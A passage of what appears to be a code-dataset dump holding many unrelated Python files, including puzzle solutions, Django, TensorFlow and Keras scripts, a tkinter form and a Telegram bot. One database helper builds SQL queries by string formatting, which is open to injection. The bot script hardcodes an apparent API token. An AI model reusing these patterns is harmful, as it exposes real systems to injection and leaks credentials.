\\nI therefore hope we could have the chance to discuss about \"+\n\t\t\"this opportunity further in an interview session.\\nSincerely, \\n\\n\"+name)\nprint(coverletter)\n\n\n\n","sub_path":"NLP.py","file_name":"NLP.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"18821818","text":"import re\nimport collections\nimport itertools\nimport math\nimport operator\n\nMAX_ROUNDS = 500\n\ndef magnitude(seq):\n return sum(map(abs, seq))\n\ndef get_data():\n data = []\n with open(\"20_input.txt\") as file:\n for line in file:\n d = {}\n for part in line.split(\", \"):\n m = re.match(r\"(.)=<(-?\\d+),(-?\\d+),(-?\\d+)>\", part)\n key, *vals = m.groups()\n d[key] = list(map(int,vals))\n data.append(d)\n return data\n\ndef tick(data):\n for d in data:\n for i in range(3):\n d[\"v\"][i] += d[\"a\"][i]\n d[\"p\"][i] += d[\"v\"][i]\n\ndef intersection(a, b):\n \"\"\"\n given particles a and b, \n returns the first non-negative integer time that they will collide, \n or None if they don't collide at a non-negative integer time.\n \"\"\"\n\n def is_perfect_square(x):\n root = int(math.sqrt(x))\n return root**2 == x\n\n def quadratic_for_ints(a,b,c):\n \"\"\"returns a list of integer solutions\"\"\"\n if a == 0:\n if b == 0:\n if c == 0:\n #nasty hack: there are infinite solutions,\n #but we can't return an infinite list,\n #so just return this sentinel value.\n return [float(\"inf\")]\n else:\n return []\n else:\n if c%b != 0: return []\n return [-c//b]\n x = b**2 - 4*a*c\n if x < 0 or not is_perfect_square(x):\n return []\n ops = (operator.add, operator.sub)\n numerators = [op(-b, int(math.sqrt(x))) for op in ops]\n integer_results = [x // (2*a) for x in numerators if x % (2*a) == 0]\n return [x for x in integer_results if x>=0]\n\n if a == b:\n return 0\n\n candidates = []\n for i in range(3):\n da = b[\"a\"][i]-a[\"a\"][i]\n dv = b[\"v\"][i]-a[\"v\"][i]\n dp = b[\"p\"][i]-a[\"p\"][i]\n times = quadratic_for_ints(\n da,\n da + 2*dv,\n 2*dp\n )\n if float(\"inf\") not in times:\n candidates.append(set(times))\n candidates = set.intersection(*candidates)\n candidates = [t for t in candidates if t > 0]\n return min(candidates) if candidates else None\n\n#part 1\n#todo: find solution for this that doesn't assume the answer can be found within MAX_ROUNDS ticks\ndata = get_data()\nfor round in range(MAX_ROUNDS):\n tick(data)\nclosest = min(data, key=lambda d: magnitude(d[\"p\"]))\nprint(data.index(closest))\n\n#part 2\ndata = get_data()\n#find all potential collisions, keyed by time\ncollisions = collections.defaultdict(set)\nfor i in range(len(data)):\n for j in range(i+1, len(data)):\n t = intersection(data[i],data[j])\n if t:\n collisions[t].add(i)\n collisions[t].add(j)\n\n#not all of those possible collisions are necessarily real;\n#if particles 0 and 1 collide at time T=23,\n#then a projected collision of particles 0 and 2 at time T=42 won't occur.\n#so let's iterate through these in time order and track which ones actually happen.\ndestroyed = set()\nfor k, v in sorted(collisions.items()):\n undestroyed_particles = [idx for idx in v if idx not in destroyed]\n if len(undestroyed_particles) >= 2:\n destroyed.update(set(v))\nprint(len(data) - len(destroyed))\n","sub_path":"day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"591255518","text":"# -*- coding: utf-8 -*-\nfrom __future__ 
import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('bulls', '0004_auto_20160522_1406'),\n    ]\n\n    operations = [\n        migrations.AlterModelOptions(\n            name='game',\n            options={'verbose_name': 'peli', 'verbose_name_plural': 'pelit'},\n        ),\n        migrations.AddField(\n            model_name='player',\n            name='player_id',\n            field=models.CharField(max_length=128, null=True, verbose_name='id', blank=True),\n        ),\n    ]\n","sub_path":"bulls/migrations/0005_auto_20160522_1420.py","file_name":"0005_auto_20160522_1420.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"383191638","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.engine.url import URL\n\ndistrict_table_map = {'vps': 'vancouver', 'wcpss': 'wake'}\n\ndef connect(settings):\n    \"\"\"\n    Performs database connection using database settings from the environmental variable 'edu_db_string'.\n    Connection URL is formatted as: postgresql://<username>:<password>@<host>/<database>\n    Returns SQLAlchemy Engine instance.\n    \"\"\"\n    try:\n        engine = create_engine(URL(**settings))\n        # Test database connection.\n        connection = engine.connect()\n        connection.close()\n        return engine\n    except Exception as e:\n        e.args = (\"Could not initialize database because: \" + e.args[0],)\n        raise e\n\n\ndef get_summary_features(settings, summary_hash, schema=None):\n    schema = district_table_map[schema]\n    engine = connect(settings)\n    conn = engine.raw_connection()\n    cur = conn.cursor()\n    sql = \"SELECT * FROM {}.summary WHERE summary_hash='{}'\".format(schema, summary_hash)\n    cur.execute(sql)\n    summary = cur.fetchone()\n    if summary:\n        sql = \"SELECT * FROM {}.results WHERE summary_id='{}'\".format(schema, summary_hash)\n        cur.execute(sql)\n        # fetch the rows before closing the cursor; execute() itself returns None here\n        results = cur.fetchall()\n        cur.close()\n        conn.close()\n        return results\n    else:\n        cur.close()\n        conn.close()\n        return False\n","sub_path":"python_hylas/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"374096461","text":"import tensorflow as tf\n\n# add a version to this graph\ntf.constant(\"0.1.0\", name=\"version\")\n\n# inputs:\nbuff_1 = tf.placeholder(dtype=tf.float64, name=\"buff1\")\nshape_1 = tf.placeholder(dtype=tf.int64, name=\"shape1\")\n\nbuff_2 = tf.placeholder(dtype=tf.float64, name=\"buff2\")\nshape_2 = tf.placeholder(dtype=tf.int64, name=\"shape2\")\n\nshape_b = tf.placeholder(dtype=tf.int64, name=\"shapeBegin\")\nshape_s = tf.placeholder(dtype=tf.int64, name=\"shapeSize\")\n\n# inverse\ninv = tf.reshape(buff_1, shape=shape_1)\ninv = tf.linalg.inv(inv)\ninv = tf.reshape(inv, shape=[-1], name=\"inv\")\n\n# transpose\ntranspose = tf.reshape(buff_1, shape=shape_1)\ntranspose = tf.linalg.transpose(transpose)\ntranspose = tf.reshape(transpose, shape=[-1], name=\"transposeOp\")\n\n# qr decomposition\nqr = tf.reshape(buff_1, shape=shape_1)\nq, r = tf.linalg.qr(qr, full_matrices=False)\nq = tf.reshape(q, shape=[-1])\nr = tf.reshape(r, shape=[-1])\ntf.identity(q, name=\"qrdecomp_q\")\ntf.identity(r, name=\"qrdecomp_r\")\n\n# create matrix\nmat_zeros = tf.zeros(shape=shape_1, dtype=tf.float64)\ntf.reshape(mat_zeros, shape=[-1], name=\"zeros\")\n\nmat_ones = tf.ones(shape=shape_1, dtype=tf.float64)\ntf.reshape(mat_ones, shape=[-1], name=\"ones\")\n\nmat_rand = tf.random_uniform(shape=shape_1, dtype=tf.float64)
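\n# (added note) every op in this graph flattens its result back to a 1-D buffer, so\n# the Go caller only has to exchange flat float slices plus separate shape tensors\ntf.reshape(mat_rand, shape=[-1], 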
name=\"rand\")\n\nmat_randn = tf.random_normal(shape=shape_1, dtype=tf.float64)\ntf.reshape(mat_rand, shape=[-1], name=\"randn\")\n\n# matrix multiply\nmat_x = tf.reshape(buff_1, shape=shape_1)\nmat_y = tf.reshape(buff_2, shape=shape_2)\nmat_xy = tf.matmul(mat_x, mat_y)\ntf.shape(mat_xy, out_type=tf.int64, name=\"mulShape\")\ntf.reshape(mat_xy, shape=[-1], name=\"mul\")\n\n# matrix slice\nmat_s = tf.reshape(buff_1, shape=shape_1)\nmat_s = tf.slice(mat_s, begin=shape_b, size=shape_s)\nmat_s_shape = tf.shape(mat_s, out_type=tf.int64)\ntf.identity(mat_s_shape, name=\"sliceShapeOp\")\nmat_s =tf.reshape(mat_s, shape=[-1])\ntf.identity(mat_s, name=\"sliceOp\")\n\n# matrix reshape\nmat_reshape = tf.reshape(buff_1, shape=shape_1)\nmat_reshape = tf.reshape(mat_reshape, shape=shape_2)\nmat_reshape = tf.reshape(mat_reshape, shape=[-1])\ntf.identity(mat_reshape, name=\"reshapeOp\")\n\n# matrix repeat aka tile\nmat_tiled = tf.reshape(buff_1, shape=shape_1)\nmat_tiled = tf.tile(mat_tiled, multiples=shape_2)\nmat_tiled_shape = tf.shape(mat_tiled, out_type=tf.int64)\ntf.identity(mat_tiled_shape, name=\"tileShapeOp\")\nmat_tiled =tf.reshape(mat_tiled, shape=[-1])\ntf.identity(mat_tiled, name=\"tileOp\")\n\n# finally save the graph to be used in Go code\ngraph = tf.Session().graph_def\ntf.io.write_graph(graph, \"./model\", \"graph.pb\", as_text=False)\n\nwith tf.Session() as sess:\n tf.summary.FileWriter(logdir=\"/tmp/tensorflow/mat\", graph=sess.graph)\n\nprint(\"run 'tensorboard --logdir=/tmp/tensorflow' to view the graph\")\n","sub_path":"mat/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"439081511","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nimport functools\n\nimport numpy as np\nimport tensorflow as tf\n\nTRAIN_DATA=\"heart_train.csv\"\nTEST_DATA=\"heart_test.csv\"\n\n\nnp.set_printoptions(precision=3, suppress=True)\n\nLABEL_COLUMN = 'chd'\nLABELS = [0, 1]\n\ndef get_dataset(file_path, **kwargs):\n dataset = tf.data.experimental.make_csv_dataset(\n file_path,\n batch_size=10, # Artificially small to make examples easier to show.\n label_name=LABEL_COLUMN,\n na_value=\"?\",\n num_epochs=1,\n ignore_errors=True, \n **kwargs)\n return dataset\n\nSELECT_COLUMNS = ['sbp','tobacco','ldl','adiposity','famhist', 'typea','obesity','alcohol','age','chd']\nraw_train_data = get_dataset(TRAIN_DATA,select_columns=SELECT_COLUMNS)\nraw_test_data = get_dataset(TEST_DATA,select_columns=SELECT_COLUMNS)\n\n\ndef show_batch(dataset):\n for batch, label in dataset.take(1):\n for key, value in batch.items():\n print(\"{:20s}: {}\".format(key,value.numpy()))\n\n\n\n\ntrain_batch,label_batch = next(iter(raw_train_data))\ntest_batch,label_batch = next(iter(raw_test_data))\n\ndef pack(features, label):\n return tf.stack(list(features.values()), axis=-1), label\n\n\nclass PackNumericFeatures(object):\n def __init__(self,names):\n self.names=names\n\n def __call__(self, features, labels):\n numeric_features = [features.pop(name) for name in self.names]\n numeric_features = [tf.cast(feat, tf.float32) for feat in numeric_features]\n numeric_features = tf.stack(numeric_features, axis=-1)\n features['numeric'] = numeric_features\n\n return features, labels\n\nNUMERIC_FEATURES = ['sbp','tobacco','ldl','adiposity','typea','obesity','alcohol','age']\n\n\n\npacked_train_data = raw_train_data.map(\n PackNumericFeatures(NUMERIC_FEATURES))\n\npacked_test_data = 
raw_test_data.map(\n    PackNumericFeatures(NUMERIC_FEATURES))\n\nshow_batch(packed_train_data)\n\n\n\ntrain_batch,label_batch = next(iter(packed_train_data))\ntest_batch,label_batch = next(iter(packed_test_data))\n\nimport pandas as pd\ndesc = pd.read_csv(TRAIN_DATA)[NUMERIC_FEATURES].describe()\nprint(desc)\n\nMEAN = np.array(desc.T['mean'])\nSTD = np.array(desc.T['std'])\n\ndef normalize_numeric_data(data, mean, std):\n  # Center the data\n  return (data-mean)/std\n\nnormalizer = functools.partial(normalize_numeric_data, mean=MEAN, std=STD)\n\nnumeric_column = tf.feature_column.numeric_column('numeric', normalizer_fn=normalizer, shape=[len(NUMERIC_FEATURES)])\nnumeric_columns = [numeric_column]\nnumeric_column\n\ntrain_batch['numeric']\n\nnumeric_layer = tf.keras.layers.DenseFeatures(numeric_columns)\nnumeric_layer(train_batch).numpy()\n\n\nCATEGORIES = {\n    'famhist': ['Present', 'Absent']\n\n}\n\ncategorical_columns = []\nfor feature, vocab in CATEGORIES.items():\n  cat_col = tf.feature_column.categorical_column_with_vocabulary_list(\n        key=feature, vocabulary_list=vocab)\n  categorical_columns.append(tf.feature_column.indicator_column(cat_col))\n\nprint(categorical_columns)\n\ncategorical_layer = tf.keras.layers.DenseFeatures(categorical_columns)\npreprocessing_layer = tf.keras.layers.DenseFeatures(categorical_columns+numeric_columns)\n\n\n\n\nmodel = tf.keras.Sequential([\n  preprocessing_layer,\n  tf.keras.layers.Dense(120, activation='relu'),\n  tf.keras.layers.Dropout(0.3),\n  tf.keras.layers.Dense(60, activation='relu'),\n  tf.keras.layers.Dropout(0.3),\n  tf.keras.layers.Dense(1, activation='sigmoid'),\n\n])\n\nmodel.compile(\n    loss='binary_crossentropy',\n    optimizer='adam',\n    metrics=['accuracy'])\n\ntraining_data=packed_train_data.shuffle(500)\ntesting_data=packed_test_data\n\nprint(\"--Fit model--\")\nmodel.fit(training_data, epochs=100)\n\nprint(\"--Testing Results--\")\nmodel_loss, model_accuracy = model.evaluate(testing_data,verbose=2)\nprint(f\"Model Loss: {model_loss:.2f}\")\nprint(f\"Model Accuracy: {model_accuracy*100:.1f}%\")\n\n\n\n\n\n\n\n\n\n","sub_path":"CHD/CHDModel.py","file_name":"CHDModel.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"175788642","text":"\n\nfrom xai.brain.wordbase.nouns._cavalry import _CAVALRY\n\n#class header\nclass _CAVALRIES(_CAVALRY, ):\n\tdef __init__(self,): \n\t\t_CAVALRY.__init__(self)\n\t\tself.name = \"CAVALRIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"cavalry\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_cavalries.py","file_name":"_cavalries.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"294079574","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 23 21:29:18 2021\n\n@author: user\n\"\"\"\n\n#for number in range(1, 13):\n   # print(number)\n#vowels = 0\n#consonants = 0 \n   \n#for letter in \"Hello\":\n   # if letter.lower() in \"aeiou\":\n       # vowels = vowels + 1\n   # elif letter == \" \":\n      #  pass\n    #else:\n       # consonants = consonants + 1\n#print(\"There are {} vowels\".format(vowels))\n#print(\"There are {} consonants\".format(consonants))\n\n\n\n#students = {\n   # \"male\": [\"AlYahu\", \"Ban\"],\n  ## }\n\n#for key in students.keys():\n   # for name in students[key]:\n      #  if \"a\" in name:\n          #  print(name)\n   #        \n   \n#even_numbers = [x for x in range(1,101) if x %2 == 0]\n#print(even_numbers)\n\n#get 
sentence from user\n\noriginal = input(\"Please enter a sentence: \").lower().strip()\n\n#split sentence into words\nwords = original.split()\nprint(words)\n\n#loop through words and convert to pig latin\n\nnew_words = []\n\n#if starts with vowel, just add \"yay\"\nfor word in words:\n    if word[0] in \"aeiou\":\n        new_word = word + \"yay\"\n        new_words.append(new_word)\n    else:\n        vowel_pos = 0\n        for letter in word:\n            if letter not in \"aeiou\":\n                vowel_pos = vowel_pos + 1\n            else:\n                break\n        #Slice\n        cons = word[:vowel_pos]\n        the_rest = word[vowel_pos:]\n        new_word = the_rest + cons + \"ay\"\n        new_words.append(new_word)\n\n#Otherwise, move the first consonant cluster to end, and add \"ay\"\n\n#stick words back together\noutput = \" \".join(new_words)\n\n#output the final string\nprint(output)","sub_path":"piglatintranslator.py","file_name":"piglatintranslator.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"436339923","text":"from django.conf.urls import patterns, url\nfrom automaticPort.views import *\n\nurlpatterns = patterns('',\n    url(r'^cadastro/$', Cadastro.as_view(), name='cadastroUsuario'),\n    url(r'^ativacadastro/(?P<chaveAtivacao>.+)/$', AtivaCadastro.as_view(), name='ativaCadatro'),\n\n    url(r'^perfil/$', Perfil.as_view(), name='perfil'),\n    url(r'^editarperfil/(?P<user_id>\\d+)/$', Perfil.as_view(), name='editarPerfil'),\n\n    url(r'^recuperarsenha/$', RecuperarSenha.as_view(), name='emailRecuperarSenha'),\n    url(r'^recuperarsenhachave/(?P<chaveAtivacao>.+)/$', RecuperarSenha.as_view(), name='recuperarSenha'),\n\n    url(r'^emailativacao/$', EmailAtivacao.as_view(), name='emailAtivacao'),\n    url(r'^faleconosco/$', FaleConosco.as_view(), name='faleConosco'),\n\n    url(r'^login/$', Login.as_view(),name='login'),\n    url(r'^suporte/$', Suporte.as_view(),name='suporte'),\n    url(r'^logout/$', 'django.contrib.auth.views.logout', {'template_name': 'usuario/logout/logout.html', 'extra_context': {'controleMenu': 'logout'}}, name='logout'),\n    )","sub_path":"automaticPort/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"230009547","text":"from tkinter import *\r\n\r\n\r\ndef addtolist():\r\n    projectlist = [entry.get(), entry1.get(), entry2.get(), entry3.get()]\r\n    print(projectlist)\r\n\r\nroot = Tk()\r\n\r\nroot.geometry(\"450x300\")\r\n\r\nlabel = Label(root, text=\"Employees I.D. 
number: \")\r\nlabel.place(x=40, y=0)\r\nentry = Entry(bd=5)\r\nentry.place(x=250, y=0)\r\n\r\nlabel1 = Label(root, text=\"Name of your project: \")\r\nlabel1.place(x=40, y=40)\r\nentry1 = Entry(bd=5)\r\nentry1.place(x=250, y=40)\r\n\r\nlabel2 = Label(root, text=\"Team lead on project: \")\r\nlabel2.place(x=40, y=80)\r\nentry2 = Entry(bd=5)\r\nentry2.place(x=250, y=80)\r\n\r\nlabel3 = Label(root, text=\"Time spent on project this week: \")\r\nlabel3.place(x=40, y=120)\r\nentry3 = Entry(bd=5)\r\nentry3.place(x=250, y=120)\r\n\r\nsubmit = Button(root, text=\"Submit\", command = addtolist)\r\nsubmit.place(x=150, y=160)\r\n\r\nroot.mainloop()\r\n\r\n","sub_path":"projectCenter.py","file_name":"projectCenter.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"301714862","text":"__author__ = 'ankhbold'\n\nfrom sqlalchemy import Column, Integer, String, Date, Sequence, ForeignKey, DateTime\nfrom CaParcel import *\n\nclass VaInfoHomeBuilding(Base):\n\n __tablename__ = 'va_info_building'\n\n id = Column(Integer, primary_key=True)\n building_id = Column(String)\n area_m2 = Column(Float)\n price = Column(Float)\n floor = Column(Integer)\n room = Column(Integer)\n status_year = Column(DateTime)\n construction_year = Column(DateTime)\n\n #foreign keys:\n register_no = Column(String, ForeignKey('va_info_parcel.register_no'))\n register_no_ref = relationship(\"VaInfoHomeParcel\")\n\n landuse_building = Column(Integer, ForeignKey('cl_type_landuse_building.code'))\n landuse_building_ref = relationship(\"VaTypeLanduseBuilding\")\n\n stove_type = Column(Integer, ForeignKey('cl_type_stove.code'))\n stove_type_ref = relationship(\"VaTypeStove\")\n\n material_type = Column(Integer, ForeignKey('cl_type_material.code'))\n material_type_ref = relationship(\"VaTypeMaterial\")\n\n design_type = Column(Integer, ForeignKey('cl_type_design.code'))\n design_type_ref = relationship(\"VaTypeDesign\")\n\n heat_type = Column(Integer, ForeignKey('cl_type_heat.code'))\n heat_type_ref = relationship(\"VaTypeHeat\")\n\n building_status = Column(Integer, ForeignKey('cl_type_status_building.code'))\n building_status_ref = relationship(\"VaTypeStatusBuilding\")\n\n building_esystem = Column(Integer, ForeignKey('cl_type_engineering_system.code'))\n building_esystem_ref = relationship(\"VaTypeESystem\")\n","sub_path":"model/VaInfoHomeBuilding.py","file_name":"VaInfoHomeBuilding.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"590031833","text":"import knapsack\nimport traceback\nimport re\nfrom dynamic_programming import DynamicProgramTable\n\ndef test_knapsack(testcase):\n outputString = \"\"\n testname, items, W, included_items, total_value = testcase\n\n # Set up the dynamic programming table.\n D = DynamicProgramTable(len(items) + 1, W + 1, knapsack.cell_ordering(items, W), knapsack.fill_cell)\n\n try:\n D.fill(items=items, W=W)\n except:\n outputString += \"Exception encountered when filling dynamic-programming table:\\n\"\n outputString += traceback.format_exc()\n return outputString\n\n try:\n (res_included_items, res_total_value) = knapsack.knapsack_from_table(items,W,D)\n except:\n outputString += \"Exception encountered when running diff_from_table:\\n\"\n outputString += traceback.format_exc()\n return outputString\n\n for x in included_items:\n if not x in res_included_items:\n outputString += \"Output list should have 
included %s but did not\\n\"%str(x)\n\n for x in res_included_items:\n if not x in included_items:\n outputString += \"Output list included %s but should not have\\n\"%str(x)\n\n if res_total_value != total_value:\n outputString += \"Total value output was %s but should've been %s\\n\"%(res_total_value,total_value)\n\n return outputString\n\ndef stringToList(input):\n output = []\n tuples = input.strip(\"[()]\").split(\"), (\")\n if tuples == ['']:\n return []\n for i in tuples:\n vw = i.split(\", \")\n output.append((int(vw[0]), int(vw[1])))\n return output\n\nwith open(\"knapsack_tests.txt\", 'r') as testfile:\n L = testfile.readlines()\n num_tests_run = 0\n num_failed_tests = 0\n for l in L:\n (testname, items, W, included_items, total_value) = l.strip().split(\";\")\n testcase = (testname, stringToList(items), int(W), stringToList(included_items), int(total_value))\n test_result = test_knapsack(testcase)\n num_tests_run += 1\n if len(test_result) > 0:\n print(\"Failed test with name %s\" % testname)\n print(test_result)\n num_failed_tests += 1\n\nprint(\"Ran %d tests\"%num_tests_run)\nprint(\"Failed %d tests\"%num_failed_tests)\n","sub_path":"HW4/test_knapsack.py","file_name":"test_knapsack.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"301732270","text":"from decimal import Decimal\n\nfrom ..base import APITestCase\n\n\nclass TestGetAvailableCurrencies(APITestCase):\n def test_successful_request(self):\n response = self.client.get('/api/getAvailableCurrencies/')\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.data, [\n {'code': c, 'name': c, 'contract_address': '0x0000000000000000000000000000000000000000', 'rate': Decimal('1')}\n for c in ['DAI', 'USDC', 'USDT', 'TUSD']\n ])\n","sub_path":"user_office/tests/api/test_get_available_currencies.py","file_name":"test_get_available_currencies.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"155917235","text":"\nimport math\nimport numpy as np\nimport matplotlib.pyplot as pl\npl.rcParams['font.family'] = 'stixgeneral'\nfrom matplotlib.ticker import MaxNLocator\nfrom astropy.table import Table\nimport json\nfrom scipy import constants\n\n#\ndef interp_json(infil,fit_cmp):\n\n #infil = '../../data/J1534+5015_model.json'\n #fit_cmp = 'z-0.00005_NaI'\n\n with open(infil) as data_file:\n data=json.load(data_file)\n\n systems=['z0.00000_MW']\n #components=[]\n\n cmp_dict = 0\n for cmp in data[\"cmps\"]:\n systems.append(str(cmp))\n #print(data[\"cmps\"][str(cmp)]['wrest'])\n if(fit_cmp == str(cmp)):\n cmp_dict=data[\"cmps\"][str(cmp)]\n\n if(cmp_dict==0):\n print(\"Your selected system is not in this json file!\")\n print(\"Pick one of the following:\")\n print(systems)\n\n #cmp_data+=str(cmp)+';'\n #cmp_data+=str(cmp_dict[\"Reliability\"])+';'\n #if cmp_dict[\"Comment\"]=='':\n # cmp_data+='None;'\n #else:\n # cmp_data+=str(cmp_dict[\"Comment\"])+';'\n #cmp_data+=str(cmp_dict[\"Nfit\"])+';'\n #cmp_data+=str(cmp_dict[\"bfit\"])+';'\n #components.append(cmp_data)\n #print(cmp_dict['zfit'])\n #print(cmp_dict['vlim'])\n\n if(cmp_dict==0):\n return {'zfit':0.0, 'vlim':0.0, 'Nfit':0.0, 'bfit':0.0}\n else:\n \n zfit = cmp_dict['zfit']\n vlim = cmp_dict['vlim']\n Nfit = cmp_dict['Nfit']\n bfit = cmp_dict['bfit']\n\n lam0 = (1.0+zfit)*cmp_dict['wrest']\n lam0red = (1.0+zfit)*5897.5581\n\n print(\"igm_guesses results for this 
component:\")\n print(lam0,lam0red,cmp_dict['Nfit'],cmp_dict['bfit']) \n #print(cmp_dict.keys()) \n print(\"All systems in json file:\")\n print(systems)\n #print(components)\n\n \n return {'zfit':zfit, 'vlim':vlim, 'Nfit':Nfit, 'bfit':bfit}\n","sub_path":"interp_json.py","file_name":"interp_json.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"106986438","text":"\"\"\"\nService base class\n\"\"\"\n\n# pylint: disable=too-few-public-methods\n\n# stdlib\nfrom socket import gaierror\nfrom typing import Any, Optional, Tuple\n\n# library\nimport httpx\nimport httpcore\n\n# module\nfrom avwx.exceptions import SourceError\n\n_VALUE_ERROR = \"'{}' is not a valid report type for {}. Expected {}\"\n\n\nclass Service:\n \"\"\"Base Service class for fetching reports\"\"\"\n\n url: Optional[str] = None\n report_type: str\n _valid_types: Tuple[str, ...] = tuple()\n\n def __init__(self, report_type: str):\n if self._valid_types:\n if report_type not in self._valid_types:\n raise ValueError(\n _VALUE_ERROR.format(\n report_type, self.__class__.__name__, self._valid_types\n )\n )\n self.report_type = report_type\n\n\nclass CallsHTTP:\n \"\"\"Service supporting HTTP requests\"\"\"\n\n method: str = \"GET\"\n\n async def _call(\n self,\n url: str,\n params: dict = None,\n headers: dict = None,\n data: Any = None,\n timeout: int = 10,\n ) -> str:\n name = self.__class__.__name__\n try:\n async with httpx.AsyncClient(timeout=timeout) as client:\n if self.method.lower() == \"post\":\n resp = await client.post(\n url, params=params, headers=headers, data=data\n )\n else:\n resp = await client.get(url, params=params, headers=headers)\n if resp.status_code != 200:\n raise SourceError(f\"{name} server returned {resp.status_code}\")\n except (\n httpx.ConnectTimeout,\n httpx.ReadTimeout,\n httpcore.ReadTimeout,\n ) as timeout_error:\n raise TimeoutError(f\"Timeout from {name} server\") from timeout_error\n except (gaierror, httpcore.ConnectError, httpx.ConnectError) as connect_error:\n raise ConnectionError(\n f\"Unable to connect to {name} server\"\n ) from connect_error\n except httpcore.NetworkError as network_error:\n raise ConnectionError(\n f\"Unable to read data from {name} server\"\n ) from network_error\n return resp.text\n","sub_path":"avwx/service/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"130637550","text":"\nimport logging\nfrom Database import *\nfrom telebot import *\n\nbot = TeleBot(\"549806791:AAHdVNTdoW-f9_350AzF9zS3Vmqtyk9Fi_Y\")\n\n@bot.message_handler(commands=[\"check\"])\ndef hello(message):\n print(message)\n bot_markup = types.InlineKeyboardMarkup()\n btn_set_Review = types.InlineKeyboardButton(text=\"Оставить отзыв\", url=\"https://habrhabr.ru\")\n bot_markup.add(btn_set_Review)\n bot.send_message(message.chat.id, \"Проверка\", reply_markup = bot_markup)\n\n@bot.message_handler(content_types=[\"contact\"])\ndef newContact(message):\n DataBase().newSubscriber(message.from_user.id, message.contact.user_id)\n #DataBase().getSubscribes(message.from_user.id)\n\n@bot.message_handler(commands=[\"myfriends\"])\ndef getSubs(message):\n subs = DataBase().getSubscribes(message.from_user.id)\n bot.send_message(message.chat.id, \"Ваши друзья: \" + str(subs))\n\n\nbot.polling()\n\n\n\"\"\"class DataBase():\n def __init__(self):\n self.connection = 
sqlite3.connect(\"test.db\")\n        self.cursor = self.connection.cursor()\n\n    def _createTables(self):\n        self.cursor.execute(\"CREATE TABLE IF NOT EXISTS users (user_id INT, subscribed_to_user_id INT)\")\n        self.connection.commit()\n\n    def newSubscriber(self, from_user_id, to_user_id):\n        self.cursor.execute(\"INSERT INTO users VALUES({0}, {1})\".format(from_user_id, to_user_id))\n        self.connection.commit()\n\n    def getSubscribes(self, from_user_id):\n        self.cursor.execute(\"SELECT subscribed_to_user_id FROM users WHERE user_id = {0}\".format(from_user_id))\n        data = self.cursor.fetchall()\n        print(data)\n        #return data\n\n\"\"\"","sub_path":"Testing.py","file_name":"Testing.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"226727566","text":"class Connectivity:\n    def __init__(self):\n        self.data = None\n        self.length = None\n\n    def union(self, element, to_element):\n        raise NotImplementedError\n\n    def is_connected(self, element, to_element):\n        raise NotImplementedError\n\n    @staticmethod\n    def drop(obj):\n        obj.data = [i for i in range(obj.length)]\n        print('=== Dropped ===')\n\n    def show_connection(self, element, to_element):\n        print(f'id {element} connected to id {to_element}: ', self.is_connected(element, to_element))\n\n    def __repr__(self):\n        a = [i for i in range(self.length)]\n        b = self.data\n        return f'{a} \"ids\"\\n{b}\\n'\n\n    def __str__(self):\n        return self.__repr__()\n\n\nclass QuickFind(Connectivity):\n    def __init__(self, length):\n        super().__init__()\n        self.length = length\n        self.data = [i for i in range(length)]\n\n    def union(self, element, to_element):\n        if self.is_connected(element, to_element):\n            return\n\n        element_value = self.data[element]\n        to_element_value = self.data[to_element]\n\n        for i in range(self.length):\n            if self.data[i] == element_value:\n                self.data[i] = to_element_value\n\n    def is_connected(self, element, to_element):\n        return self.data[element] == self.data[to_element]\n\n\nclass QuickUnion(Connectivity):\n    def __init__(self, length):\n        super().__init__()\n        self.length = length\n        self.data = [i for i in range(length)]\n\n    def _get_root(self, i):\n\n        while i != self.data[i]:\n            i = self.data[i]\n\n        return i\n\n    def union(self, element, to_element):\n        element_root = self._get_root(element)\n        to_element_root = self._get_root(to_element)\n        